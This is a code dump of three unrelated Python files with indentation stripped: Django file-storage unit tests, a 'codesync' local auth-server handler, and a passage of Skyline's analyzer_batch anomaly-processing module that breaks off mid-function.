settings.FILE_UPLOAD_PERMISSIONS = 0666
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
settings.FILE_UPLOAD_PERMISSIONS = self.old_perms
shutil.rmtree(self.storage_dir)
def test_file_upload_permissions(self):
name = self.storage.save("the_file", ContentFile("data"))
actual_mode = os.stat(self.storage.path(name))[0] & 0777
self.assertEqual(actual_mode, 0666)
class FileStoragePathParsing(unittest.TestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
shutil.rmtree(self.storage_dir)
def test_directory_with_dot(self):
"""Regression test for #9610.
If the directory name contains a dot and the file name doesn't, make
sure we still mangle the file name instead of the directory name.
"""
self.storage.save('dotted.path/test', ContentFile("1"))
self.storage.save('dotted.path/test', ContentFile("2"))
self.failIf(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
self.assert_(os.path.exists(os.path.join(self.storage_dir, 'dotted.path/test')))
self.assert_(os.path.exists(os.path.join(self.storage_dir, 'dotted.path/test_1')))
def test_first_character_dot(self):
"""
File names with a dot as their first character don't have an extension,
and the underscore should get added to the end.
"""
self.storage.save('dotted.path/.test', ContentFile("1"))
self.storage.save('dotted.path/.test', ContentFile("2"))
self.assert_(os.path.exists(os.path.join(self.storage_dir, 'dotted.path/.test')))
# Before 2.6, a leading dot was treated as an extension, and so
# underscore gets added to beginning instead of end.
if sys.version_info < (2, 6):
self.assert_(os.path.exists(os.path.join(self.storage_dir, 'dotted.path/_1.test')))
else:
self.assert_(os.path.exists(os.path.join(self.storage_dir, 'dotted.path/.test_1')))
class DimensionClosingBug(unittest.TestCase):
"""
Test that get_image_dimensions() properly closes files (#8817)
"""
@unittest.skipUnless(Image, "PIL not installed")
def test_not_closing_of_files(self):
"""
Open files passed into get_image_dimensions() should stay opened.
"""
empty_io = StringIO()
try:
get_image_dimensions(empty_io)
finally:
self.assert_(not empty_io.closed)
@unittest.skipUnless(Image, "PIL not installed")
def test_closing_of_filenames(self):
"""
get_image_dimensions() called with a filename should closed the file.
"""
# We need to inject a modified open() builtin into the images module
# that checks if the file was closed properly if the function is
# called with a filename instead of an file object.
# get_image_dimensions will call our catching_open instead of the
# regular builtin one.
class FileWrapper(object):
_closed = []
def __init__(self, f):
self.f = f
def __getattr__(self, name):
return getattr(self.f, name)
def close(self):
self._closed.append(True)
self.f.close()
def catching_open(*args):
return FileWrapper(open(*args))
from django.core.files import images
images.open = catching_open
try:
get_image_dimensions(os.path.join(os.path.dirname(__file__), "test1.png"))
finally:
del images.open
self.assert_(FileWrapper._closed)
class InconsistentGetImageDimensionsBug(unittest.TestCase):
"""
Test that get_image_dimensions() works properly after various calls
using a file handler (#11158)
"""
@unittest.skipUnless(Image, "PIL not installed")
def test_multiple_calls(self):
"""
Multiple calls of get_image_dimensions() should return the same size.
"""
from django.core.files.images import ImageFile
img_path = os.path.join(os.path.dirname(__file__), "test.png")
image = ImageFile(open(img_path, 'rb'))
image_pil = Image.open(img_path)
size_1, size_2 = get_image_dimensions(image), get_image_dimensions(image)
self.assertEqual(image_pil.size, size_1)
self.assertEqual(size_1, size_2)
|
handler.py
|
import shelve
import socket
import subprocess
import time
from threading import Thread
import requests
from codesync.auth.server import start_server
from codesync.constants import CACHE_FILE_PATH
from codesync.settings import IS_DEV
class AuthServerHandler(object):
@staticmethod
def get_open_port():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("", 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
@staticmethod
def get_port_from_shelve():
d = shelve.open(CACHE_FILE_PATH)
port = d.get('port')
d.close()
return port
@staticmethod
def clean_up_shelve():
# Clean up shelve
d = shelve.open(CACHE_FILE_PATH)
for key in ['access_token']:
if d.get(key):
del d[key]
d.close()
@staticmethod
def start_thread(port):
thread = Thread(target=start_server, args=(port,))
thread.setDaemon(True)
thread.start()
def check_server_running(self):
# See if saved port is working
port = self.get_port_from_shelve()
if port:
plugin_server = f"http://localhost:{port}"
try:
response = requests.get(plugin_server)
# TODO: Improve this by verifying specific response
server_is_up = response.ok
if server_is_up:
self.clean_up_shelve()
return port
except Exception:
pass
def trigger_from_cli(self):
# Get port and set in shelve
port = self.get_open_port()
d = shelve.open(CACHE_FILE_PATH)
d['port'] = port
d.close()
command = f"python3 -m codesync.cli --run-auth-server -p {port}" if IS_DEV else \
f"codesync --run-auth-server -p {port}"
try:
subprocess.Popen(command, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, shell=True)
except Exception:
print("Failed to start auth-server")
raise
# Sleep added to wait for the server to start
time.sleep(3)
return port
def restart(self):
port = self.check_server_running()
if not port:
self.clean_up_shelve()
port = self.get_open_port()
d = shelve.open(CACHE_FILE_PATH)
d['port'] = port
d.close()
self.start_thread(port)
return port
|
analyzer_batch.py
|
from __future__ import division
import logging
try:
from Queue import Empty
except:
from queue import Empty
from time import time, sleep
from threading import Thread
from collections import defaultdict
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Use Redis sets in place of Manager().list to reduce memory and number of
# processes
# from multiprocessing import Process, Manager, Queue
from multiprocessing import Process, Queue
from msgpack import Unpacker
import os
from os import kill, getpid
import traceback
import re
from sys import version_info
import os.path
from ast import literal_eval
import settings
from skyline_functions import (
write_data_to_file, send_anomalous_metric_to, mkdir_p,
filesafe_metricname,
# @added 20170602 - Feature #2034: analyse_derivatives
nonNegativeDerivative, strictly_increasing_monotonicity, in_list,
# @added 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# Added a single functions to deal with Redis connection and the
# charset='utf-8', decode_responses=True arguments required in py3
get_redis_conn, get_redis_conn_decoded,
# @added 20200506 - Feature #3532: Sort all time series
sort_timeseries)
# @added 20200425 - Feature #3512: matched_or_regexed_in_list function
# Feature #3508: ionosphere_untrainable_metrics
# Feature #3486: analyzer_batch
from matched_or_regexed_in_list import matched_or_regexed_in_list
# @modified 20200423 - Feature #3504: Handle airgaps in batch metrics
# Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# Changed to algoritms_batch so there is no pollution and
# analyzer and analyzer_batch are totally independent
# from algorithms import run_selected_algorithm
from algorithms_batch import run_selected_batch_algorithm
from algorithm_exceptions import TooShort, Stale, Boring
# TODO if settings.ENABLE_CRUCIBLE: and ENABLE_PANORAMA
# from spectrum import push_to_crucible
skyline_app = 'analyzer_batch'
skyline_app_logger = '%sLog' % skyline_app
logger = logging.getLogger(skyline_app_logger)
skyline_app_logfile = '%s/%s.log' % (settings.LOG_PATH, skyline_app)
skyline_app_loglock = '%s.lock' % skyline_app_logfile
skyline_app_logwait = '%s.wait' % skyline_app_logfile
python_version = int(version_info[0])
this_host = str(os.uname()[1])
try:
SERVER_METRIC_PATH = '.%s' % settings.SERVER_METRICS_NAME
if SERVER_METRIC_PATH == '.':
SERVER_METRIC_PATH = ''
except:
SERVER_METRIC_PATH = ''
# @added 20190410 - Feature #2916: ANALYZER_ENABLED setting
try:
ANALYZER_ENABLED = settings.ANALYZER_ENABLED
logger.info('ANALYZER_ENABLED is set to %s' % str(ANALYZER_ENABLED))
except:
ANALYZER_ENABLED = True
logger.info('warning :: ANALYZER_ENABLED is not declared in settings.py, defaults to True')
try:
from settings import BATCH_PROCESSING
except:
BATCH_PROCESSING = None
# @added 20200425 - Feature #3508: ionosphere.untrainable_metrics
# Determine if any metrcs have negatives values some they can be
# added to the ionosphere.untrainable_metrics Redis set
try:
# @modified 20200606 - Bug #3572: Apply list to settings import
KNOWN_NEGATIVE_METRICS = list(settings.KNOWN_NEGATIVE_METRICS)
except:
KNOWN_NEGATIVE_METRICS = []
# @added 20200607 - Feature #3566: custom_algorithms
try:
CUSTOM_ALGORITHMS = settings.CUSTOM_ALGORITHMS
except:
CUSTOM_ALGORITHMS = None
try:
DEBUG_CUSTOM_ALGORITHMS = settings.DEBUG_CUSTOM_ALGORITHMS
except:
DEBUG_CUSTOM_ALGORITHMS = False
# @added 20200727 - Feature #3650: ROOMBA_DO_NOT_PROCESS_BATCH_METRICS
# Feature #3480: batch_processing
# Feature #3486: analyzer_batch
try:
from settings import ROOMBA_DO_NOT_PROCESS_BATCH_METRICS
except:
ROOMBA_DO_NOT_PROCESS_BATCH_METRICS = False
if ROOMBA_DO_NOT_PROCESS_BATCH_METRICS:
try:
from types import TupleType
except ImportError:
eliminated_in_python3 = True
from redis import WatchError
from msgpack import packb
# @added 20200817 - Feature #3684: ROOMBA_BATCH_METRICS_CUSTOM_DURATIONS
# Feature #3650: ROOMBA_DO_NOT_PROCESS_BATCH_METRICS
# Feature #3480: batch_processing
# Allow for custom durations on namespaces
ROOMBA_BATCH_METRICS_CUSTOM_DURATIONS = []
if ROOMBA_DO_NOT_PROCESS_BATCH_METRICS:
try:
from settings import ROOMBA_BATCH_METRICS_CUSTOM_DURATIONS
except:
ROOMBA_BATCH_METRICS_CUSTOM_DURATIONS = False
# @added 20200815 - Feature #3678: SNAB - anomalyScore
try:
SNAB_DATA_DIR = settings.SNAB_DATA_DIR
except:
SNAB_DATA_DIR = '/opt/skyline/SNAB'
try:
SNAB_anomalyScore = settings.SNAB_anomalyScore
except:
SNAB_anomalyScore = {}
# @added 20201017 - Feature #3818: ANALYZER_BATCH_PROCESSING_OVERFLOW_ENABLED
try:
ANALYZER_BATCH_PROCESSING_OVERFLOW_ENABLED = settings.ANALYZER_BATCH_PROCESSING_OVERFLOW_ENABLED
except:
ANALYZER_BATCH_PROCESSING_OVERFLOW_ENABLED = False
try:
BATCH_MODE = settings.BATCH_PROCESSING_BATCH_MODE
except:
BATCH_MODE = True
skyline_app_graphite_namespace = 'skyline.%s%s' % (skyline_app, SERVER_METRIC_PATH)
LOCAL_DEBUG = False
class AnalyzerBatch(Thread):
"""
The AnalyzerBatch class which controls the analyzer.batch thread and spawned
processes.
Made with love to the analyzer_batch playlist:
https://soundcloud.com/earthgecko/sets/analyzer_batch
https://soundcloud.com/thedeltariggs/ode-to-jeremiah (I can't tell what I've seen..)
https://soundcloud.com/egroove/premiere-francesco-chiocci-feat-black-soda-musumeci-remix-connaisseur-recordings (picking up pieces of my weary mind)
https://soundcloud.com/when-we-dip/premiere-francesco-chiocci-ft-black-soda-black-sunrise-peter-pardeike-remix
https://soundcloud.com/timgreen/atelier-francesco-manuel-feat-astrid-dead-end-tim-green-remixcityfox-1
https://soundcloud.com/imbernonmusic/edu-imbernon-fixing-fires
https://soundcloud.com/deep-house-amsterdam/oliver-koletzki-deep-house-amsterdam-dgtl-podcast-007
https://soundcloud.com/crosstownrebels/crm140-damian-lazarus-the-ancient-moons-vermillion-agoria-remix-1
https://soundcloud.com/wiewouwat/joy-wellboy-before-the-sunrise
https://soundcloud.com/agoria/damian-lazarus-the-ancent-moons-vermillion-agoria-remix
https://soundcloud.com/wearesoundspace/premiere-just-her-feat-kieran-fowkes-let-myself-go
https://soundcloud.com/watergaterecords/matthias-meyer-november-rain
https://soundcloud.com/musicthatmakesmewannasurf/mixtape-2-w-kosson
"""
def __init__(self, parent_pid):
"""
Initialize the AnalyzerBatch
Create the :obj:`self.batch_exceptions_q` queue
Create the :obj:`self.batch_anomaly_breakdown_q` queue
"""
super(AnalyzerBatch, self).__init__()
self.redis_conn = get_redis_conn(skyline_app)
self.redis_conn_decoded = get_redis_conn_decoded(skyline_app)
self.daemon = True
self.parent_pid = parent_pid
self.current_pid = getpid()
self.batch_exceptions_q = Queue()
self.batch_anomaly_breakdown_q = Queue()
def check_if_parent_is_alive(self):
"""
Self explanatory
"""
try:
kill(self.current_pid, 0)
kill(self.parent_pid, 0)
except:
exit(0)
def spin_batch_process(self, i, run_timestamp, metric_name, last_analyzed_timestamp, batch=[]):
"""
Assign a metric and last_analyzed_timestamp for a process to analyze.
:param i: python process id
:param run_timestamp: the epoch timestamp at which this process was called
:param metric_name: the FULL_NAMESPACE metric name as keyed in Redis
:param last_analyzed_timestamp: the last analysed timestamp as recorded
in the Redis key last_timestamp.basename key.
:return: returns True
"""
spin_start = time()
child_batch_process_pid = os.getpid()
metrics_processed = 0
if not batch:
batch_mode = False
metrics = [[metric_name, last_analyzed_timestamp]]
logger.info('child_batch_process_pid - %s, processing %s from %s' % (
str(child_batch_process_pid), metric_name, str(last_analyzed_timestamp)))
else:
batch_mode = True
metrics = batch
number_of_metrics = len(batch)
logger.info('child_batch_process_pid - %s, processing %s metrics in batch mode' % (
str(child_batch_process_pid), str(number_of_metrics)))
# Make process-specific dicts
exceptions = defaultdict(int)
anomaly_breakdown = defaultdict(int)
# Determine the unique Mirage and Ionosphere metrics once, which are
# used later to determine how Analyzer should handle/route anomalies
try:
mirage_unique_metrics = list(self.redis_conn_decoded.smembers('mirage.unique_metrics'))
except:
mirage_unique_metrics = []
try:
ionosphere_unique_metrics = list(self.redis_conn_decoded.smembers('ionosphere.unique_metrics'))
except:
ionosphere_unique_metrics = []
# In order to convert monotonic, incrementing metrics to a deriative
# metric
try:
derivative_metrics = list(self.redis_conn_decoded.smembers('derivative_metrics'))
except:
derivative_metrics = []
try:
non_derivative_metrics = list(self.redis_conn_decoded.smembers('non_derivative_metrics'))
except:
non_derivative_metrics = []
try:
# @modified 20200606 - Bug #3572: Apply list to settings import
non_derivative_monotonic_metrics = list(settings.NON_DERIVATIVE_MONOTONIC_METRICS)
except:
non_derivative_monotonic_metrics = []
non_smtp_alerter_metrics = []
try:
non_smtp_alerter_metrics = list(self.redis_conn_decoded.smembers('analyzer.non_smtp_alerter_metrics'))
except:
non_smtp_alerter_metrics = []
for item in metrics:
metric_name = item[0]
last_analyzed_timestamp = item[1]
if batch_mode:
metrics_processed += 1
logger.info('processing metric %s of %s' % (
str(metrics_processed), str(number_of_metrics)))
# Identify last timestamp
metric_timestamp = None
# Identify anomalies
# Handle EXPIRATION_TIME
# Ship to Analyzer, Mirage or Ionosphere
# @added 20200728 - Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# If multiple work items exist and the timestamp in the work item is
# older than the last analyzed timestamp reported by Redis key, just
# skip and remove the work item
if metric_name.startswith(settings.FULL_NAMESPACE):
base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
else:
base_name = metric_name
# Check the last_timestamp metric Redis key
last_metric_timestamp_key = 'last_timestamp.%s' % base_name
redis_key_set = None
last_redis_timestamp = 0
try:
last_redis_timestamp_data = self.redis_conn_decoded.get(last_metric_timestamp_key)
last_redis_timestamp = int(last_redis_timestamp_data)
except:
logger.error('error :: failed to get Redis key %s' % last_metric_timestamp_key)
get_raw_series = True
if last_redis_timestamp:
if last_redis_timestamp > last_analyzed_timestamp:
get_raw_series = False
logger.info('The %s is %s, the passed last_analyzed_timestamp is %s, not getting raw_series returning' % (
last_metric_timestamp_key, str(last_redis_timestamp),
str(last_analyzed_timestamp)))
if LOCAL_DEBUG:
logger.debug('debug :: getting Redis time series data for %s' % (base_name))
raw_series = None
# @modified 20200728 - Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# Only resurface the timeseries if the work item timestamp is greater
# than the last analyzed timestamp reported by Redis key
if get_raw_series:
try:
raw_series = self.redis_conn.get(metric_name)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get %s from Redis' % metric_name)
raw_series = None
if not raw_series:
logger.info('No raw_series defined, returning')
# Remove for work list
redis_set = 'analyzer.batch'
data = [metric_name, int(last_analyzed_timestamp)]
try:
self.redis_conn.srem(redis_set, str(data))
logger.info('analyzer_batch :: removed batch metric item - %s - from Redis set - %s' % (str(data), redis_set))
except:
logger.error(traceback.format_exc())
logger.error('error :: analyzer_batch :: failed to remove batch metric item - %s - from Redis set - %s' % (str(data), redis_set))
if batch_mode:
continue
else:
return
try:
unpacker = Unpacker(use_list=False)
unpacker.feed(raw_series)
timeseries = list(unpacker)
except:
timeseries = []
# @added 20200506 - Feature #3532: Sort all time series
# To ensure that there are no unordered timestamps in the time
# series which are artefacts of the collector or carbon-relay, sort
# all time series by timestamp before analysis.
original_timeseries = timeseries
if original_timeseries:
timeseries = sort_timeseries(original_timeseries)
del original_timeseries
try:
del raw_series
except:
pass
if LOCAL_DEBUG:
logger.debug('debug :: got Redis time series data for %s' % (base_name))
# @added 20200727 - Feature #3650: ROOMBA_DO_NOT_PROCESS_BATCH_METRICS
# Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# euthanize keys if not done in roomba, allows for backfill processing
# via analyzer_batch
roombaed = False
if ROOMBA_DO_NOT_PROCESS_BATCH_METRICS:
if LOCAL_DEBUG:
logger.debug('debug :: checking if roomba needs to be run on %s' % (base_name))
now = int(time())
duration = settings.FULL_DURATION + settings.ROOMBA_GRACE_TIME
key = metric_name
# @added 20200817 - Feature #3684: ROOMBA_BATCH_METRICS_CUSTOM_DURATIONS
# Feature #3650: ROOMBA_DO_NOT_PROCESS_BATCH_METRICS
# Feature #3480: batch_processing
# Allow for custom durations on namespaces, this is for testing to
# allow the Redis key to have data at a different resolution than
# FULL_DURATION, which allows for feeding a metric at 1 data point
# per 10 mins (ala fake Mirage)
try:
if ROOMBA_BATCH_METRICS_CUSTOM_DURATIONS:
for metric_namespace, custom_full_duration in ROOMBA_BATCH_METRICS_CUSTOM_DURATIONS:
if metric_namespace in base_name:
duration = custom_full_duration + settings.ROOMBA_GRACE_TIME
logger.info('batch_processing :: %s found in ROOMBA_BATCH_METRICS_CUSTOM_DURATIONS, duration for roomba set to %s' % (
base_name, str(duration)))
except:
logger.error(traceback.format_exc())
logger.error('error :: analyzer_batch :: failed to remove batch metric item - %s - from Redis set - %s' % (str(data), redis_set))
namespace_unique_metrics = '%sunique_metrics' % str(settings.FULL_NAMESPACE)
euthanized = 0
trimmed_keys = 0
active_keys = 0
try:
# Put pipe back in multi mode
pipe = self.redis_conn.pipeline()
# WATCH the key
pipe.watch(key)
pipe.multi()
# There's one value. Purge if it's too old
last_timestamp = int(timeseries[-1][0])
# Do not purge if it has not been analyzed
if (last_timestamp - duration) > last_analyzed_timestamp:
logger.info('batch_processing :: last_timestamp is %s, but for roomba setting to the last_analyzed_timestamp (%s) as it has not been analyzed' % (
str(last_timestamp), str(last_analyzed_timestamp)))
last_timestamp = last_analyzed_timestamp
now = int(last_analyzed_timestamp)
logger.info('batch_processing :: doing roomba on %s with %s data points' % (key, str(len(timeseries))))
roombaed = True
try:
if python_version == 2:
if not isinstance(timeseries[0], TupleType):
if timeseries[0] < last_timestamp - duration:
pipe.delete(key)
pipe.srem(namespace_unique_metrics, key)
pipe.execute()
euthanized += 1
timeseries = []
if python_version == 3:
if not isinstance(timeseries[0], tuple):
if timeseries[0] < now - duration:
pipe.delete(key)
pipe.srem(namespace_unique_metrics, key)
pipe.execute()
euthanized += 1
timeseries = []
except IndexError:
timeseries = []
# Check if the last value is too old and purge
if timeseries[-1][0] < now - duration:
pipe.delete(key)
pipe.srem(namespace_unique_metrics, key)
pipe.execute()
euthanized += 1
timeseries = []
# Remove old datapoints and duplicates from timeseries
temp = set()
temp_add = temp.add
delta = now - duration
trimmed = [
tuple for tuple in timeseries
if tuple[0] > delta and
tuple[0] not in temp and not
temp_add(tuple[0])
]
# Purge if everything was deleted, set key otherwise
if len(trimmed) > 0:
# Serialize and turn key back into not-an-array
btrimmed = packb(trimmed)
if len(trimmed) <= 15:
value = btrimmed[1:]
elif len(trimmed) <= 65535:
value = btrimmed[3:]
trimmed_keys += 1
else:
value = btrimmed[5:]
trimmed_keys += 1
pipe.set(key, value)
active_keys += 1
else:
pipe.delete(key)
pipe.srem(namespace_unique_metrics, key)
euthanized += 1
pipe.execute()
except WatchError:
logger.info('batch_processing :: blocked from euthanizing %s' % (key))
except Exception as e:
# If something bad happens, zap the key and hope it goes away
# pipe.delete(key)
# pipe.srem(namespace_unique_metrics, key)
# pipe.execute()
# euthanized += 1
logger.info(e)
logger.info('batch_processing :: something bad happened but not euthanizing %s' % (key))
finally:
pipe.reset()
raw_series = None
try:
raw_series = self.redis_conn.get(metric_name)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get %s from Redis' % metric_name)
raw_series = None
if not raw_series:
logger.info('No raw_series defined after euthanizing %s, returning' % (key))
# Remove for work list
redis_set = 'analyzer.batch'
data = [metric_name, int(last_analyzed_timestamp)]
try:
self.redis_conn.srem(redis_set, str(data))
logger.info('analyzer_batch :: removed batch metric item - %s - from Redis set - %s' % (str(data), redis_set))
except:
logger.error(traceback.format_exc())
logger.error('error :: analyzer_batch :: failed to remove batch metric item - %s - from Redis set - %s' % (str(data), redis_set))
if batch_mode:
continue
else:
return
try:
unpacker = Unpacker(use_list=False)
unpacker.feed(raw_series)
timeseries = list(unpacker)
if roombaed:
logger.info('batch_processing :: after roomba %s has %s data points' % (key, str(len(timeseries))))
except:
timeseries = []
# @added 20200506 - Feature #3532: Sort all time series
# To ensure that there are no unordered timestamps in the time
# series which are artefacts of the collector or carbon-relay, sort
# all time series by timestamp before analysis.
original_timeseries = timeseries
if original_timeseries:
timeseries = sort_timeseries(original_timeseries)
del original_timeseries
try:
del raw_series
except:
pass
timestamps_to_analyse = []
# Reverse the time series so that only the first (last) items now to be
# iterated and break after the necessary iterations so the entire
# time series is not iterated over.
reversed_timeseries = list(reversed(timeseries))
for timestamp, value in reversed_timeseries:
if int(timestamp) > last_analyzed_timestamp:
timestamps_to_analyse.append(int(timestamp))
else:
break
del reversed_timeseries
timestamps_to_analyse = list(reversed(timestamps_to_analyse))
# @added 20200413 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Handle there being no timestamps_to_analyse and report such as
# otherwise the only info logged is that the work key just gets removed
# 2020-04-14 12:57:25 :: 3222 :: there are 1 metrics to process in the analyzer.batch Redis set
# 2020-04-14 12:57:25 :: 3222 :: processing - ['vista.demo_robustperception_io.prometheus.node_disk_read_time_seconds_total', 1586868000]
# 2020-04-14 12:57:25 :: 3222 :: starting 1 of 1 spin_batch_process
# 2020-04-14 12:57:25 :: 7852 :: batch :: child_batch_process_pid - 7852, processing vista.demo_robustperception_io.prometheus.node_disk_read_time_seconds_total from 1586868000
# 2020-04-14 12:57:25 :: 7852 :: analyzer_batch :: removed work item - ['vista.demo_robustperception_io.prometheus.node_disk_read_time_seconds_total', 1586868000] - from Redis set - analyzer.batch
# 2020-04-14 12:57:25 :: 7852 :: spin_batch_process took 0.04 seconds
# 2020-04-14 12:57:25 :: 3222 :: 1 spin_batch_process completed in 0.10 seconds
# 2020-04-14 12:57:25 :: 3222 :: exceptions - Stale: 9, Boring: 6, TooShort: 0, Other: 0
# 2020-04-14 12:57:25 :: 3222 :: anomaly_breakdown - histogram_bins: 0, first_hour_average: 0, stddev_from_average: 0, grubbs: 0, ks_test: 0, mean_subtraction_cumulation: 0, median_absolute_deviation: 0, stddev_from_moving_average: 0, least_squares: 0
number_of_timestamps_to_analyze = len(timestamps_to_analyse)
if number_of_timestamps_to_analyze == 0:
logger.info('no timestamps were found to analyze for %s from %s, nothing to do' % (
metric_name, str(last_analyzed_timestamp)))
# @added 20200424 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Feature #3504: Handle airgaps in batch metrics
# If there are no data points to analyze remove from the set
redis_set = 'analyzer.batch'
data = [metric_name, int(last_analyzed_timestamp)]
try:
self.redis_conn.srem(redis_set, str(data))
logger.info('analyzer_batch :: removed batch metric item - %s - from Redis set - %s' % (str(data), redis_set))
except:
logger.error(traceback.format_exc())
logger.error('error :: analyzer_batch :: failed to remove batch metric item - %s - from Redis set - %s' % (str(data), redis_set))
# Clean up and return
try:
del timeseries
except:
pass
try:
del timestamps_to_analyse
except:
pass
try:
del batch_timeseries
except:
pass
if batch_mode:
continue
else:
try:
del mirage_unique_metrics
except:
pass
try:
del ionosphere_unique_metrics
except:
pass
try:
del derivative_metrics
except:
pass
try:
del non_derivative_metrics
except:
pass
try:
del non_derivative_monotonic_metrics
except:
pass
try:
del non_smtp_alerter_metrics
except:
pass
return
else:
last_redis_data_timestamp = timestamps_to_analyse[-1]
logger.info('%s timestamps were found to analyze for %s from %s to %s' % (
str(number_of_timestamps_to_analyze), metric_name,
str(last_analyzed_timestamp), str(last_redis_data_timestamp)))
# @modified 20200728 - Bug #3652: Handle multiple metrics in base_name conversion
# base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
if metric_name.startswith(settings.FULL_NAMESPACE):
base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
else:
base_name = metric_name
# @added 20200425 - Feature #3508: ionosphere.untrainable_metrics
# Determine if any metrcs have negatives values some they can be
# added to the ionosphere_untrainable_metrics Redis set
run_negatives_present = False
if settings.IONOSPHERE_ENABLED:
run_negatives_present = True
try:
known_negative_metric_matched_by = None
known_negative_metric, known_negative_metric_matched_by = matched_or_regexed_in_list(skyline_app, base_name, KNOWN_NEGATIVE_METRICS)
if known_negative_metric:
run_negatives_present = False
except:
run_negatives_present = True
# @added 20170602 - Feature #2034: analyse_derivatives
# In order to convert monotonic, incrementing metrics to a deriative
# metric
known_derivative_metric = False
unknown_deriv_status = True
# @modified 20200601 - Feature #3480: batch_processing
# Bug #2050: analyse_derivatives - change in monotonicity
# Switch the order in which they are checked and do not check if
# not manage_derivative_metrics as will only be set to True anyway
# if metric_name in non_derivative_metrics:
# unknown_deriv_status = False
# if unknown_deriv_status:
# if metric_name in derivative_metrics:
# known_derivative_metric = True
# unknown_deriv_status = False
if metric_name in derivative_metrics:
known_derivative_metric = True
unknown_deriv_status = False
if unknown_deriv_status:
if metric_name in non_derivative_metrics:
unknown_deriv_status = False
# First check if it has its own Redis z.derivative_metric key
# that has not expired
derivative_metric_key = 'z.derivative_metric.%s' % str(base_name)
# @added 20200601 - Feature #3480: batch_processing
# Bug #2050: analyse_derivatives - change in monotonicity
# When a monotonic metric changes in the last run before a
# manage_derivative_metrics run, when manage_derivative_metrics runs
# it classifies it and adds it to non_derivative_metrics the only
# way to stop this is check the key for each metric
last_derivative_metric_key = None
try:
last_derivative_metric_key = self.redis_conn_decoded.get(derivative_metric_key)
except Exception as e:
logger.error('error :: could not query Redis for last_derivative_metric_key: %s' % e)
if last_derivative_metric_key:
known_derivative_metric = True
if unknown_deriv_status:
# @added 20170617 - Bug #2050: analyse_derivatives - change in monotonicity
# @modified 20200601 - Feature #3480: batch_processing
# Bug #2050: analyse_derivatives - change in monotonicity
# Always check moved to above
# last_derivative_metric_key = False
# try:
# last_derivative_metric_key = self.redis_conn.get(derivative_metric_key)
# except Exception as e:
# logger.error('error :: could not query Redis for last_derivative_metric_key: %s' % e)
# @modified 20200601 - Feature #3480: batch_processing
# Bug #2050: analyse_derivatives - change in monotonicity
# Apply skip_derivative
skip_derivative = in_list(base_name, non_derivative_monotonic_metrics)
is_strictly_increasing_monotonically = False
if not skip_derivative:
is_strictly_increasing_monotonically = strictly_increasing_monotonicity(timeseries)
if is_strictly_increasing_monotonically:
try:
last_expire_set = int(time())
self.redis_conn.setex(
derivative_metric_key, settings.FULL_DURATION, last_expire_set)
except Exception as e:
logger.error('error :: could not set Redis derivative_metric key: %s' % e)
else:
is_strictly_increasing_monotonically = False
# Determine if it is a strictly increasing monotonically metric
# or has been in last FULL_DURATION via its z.derivative_metric
# key
if last_derivative_metric_key:
# Until the z.derivative_metric key expires, it is classed
# as such
is_strictly_increasing_monotonically = True
if skip_derivative:
is_strictly_increasing_monotonically = False
if is_strictly_increasing_monotonically:
known_derivative_metric = True
try:
self.redis_conn.sadd('derivative_metrics', metric_name)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add metric to Redis derivative_metrics set')
try:
self.redis_conn.sadd('new_derivative_metrics', metric_name)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add metric to Redis new_derivative_metrics set')
try:
last_expire_set = int(time())
self.redis_conn.setex(
derivative_metric_key, settings.FULL_DURATION, last_expire_set)
except Exception as e:
logger.error('error :: could not set Redis derivative_metric key: %s' % e)
else:
try:
self.redis_conn.sadd('non_derivative_metrics', metric_name)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add metric to Redis non_derivative_metrics set')
try:
self.redis_conn.sadd('new_non_derivative_metrics', metric_name)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add metric to Redis new_non_derivative_metrics set')
not_anomalous_count = 0
# @added 20200815 - Feature #3678: SNAB - anomalyScore
record_anomalyScore = False
if SNAB_anomalyScore:
SNAB_metrics = []
try:
SNAB_all_metrics = SNAB_anomalyScore['all']
if SNAB_all_metrics:
for SNAB_metric in SNAB_all_metrics:
SNAB_metrics.append(SNAB_metric)
except:
SNAB_all_metrics = []
try:
SNAB_app_metrics = SNAB_anomalyScore[skyline_app]
if SNAB_app_metrics:
for SNAB_metric in SNAB_app_metrics:
SNAB_metrics.append(SNAB_metric)
except:
SNAB_app_metrics = []
if SNAB_metrics:
for SNAB_metric_namespace in list(set(SNAB_metrics)):
if SNAB_metric_namespace in base_name:
record_anomalyScore = True
break
test_anomaly = False
test_anomaly_at = None
try:
test_anomaly_key = 'analyzer_batch.test.%s' % base_name
try:
test_anomaly = self.redis_conn.get(test_anomaly_key)
test_anomaly_at = int(test_anomaly)
logger.info('test_anomaly - testing anomly on %s at %s' % (metric_name, str(test_anomaly_at)))
except:
test_anomaly = None
except:
test_anomaly = False
# Distill timeseries strings into lists
for i, batch_timestamp in enumerate(timestamps_to_analyse):
self.check_if_parent_is_alive()
batch_timeseries = []
for timestamp, value in timeseries:
if int(timestamp) <= batch_timestamp:
batch_timeseries.append([timestamp, value])
if known_derivative_metric:
try:
derivative_timeseries = nonNegativeDerivative(batch_timeseries)
batch_timeseries = derivative_timeseries
except:
logger.error('error :: nonNegativeDerivative failed')
try:
# Allow for testing. If you want to test a metric and then stop
# the metric sending data to carbon-relay (use a vista metric).
# Determine a timestamp that will fall into the stopped period
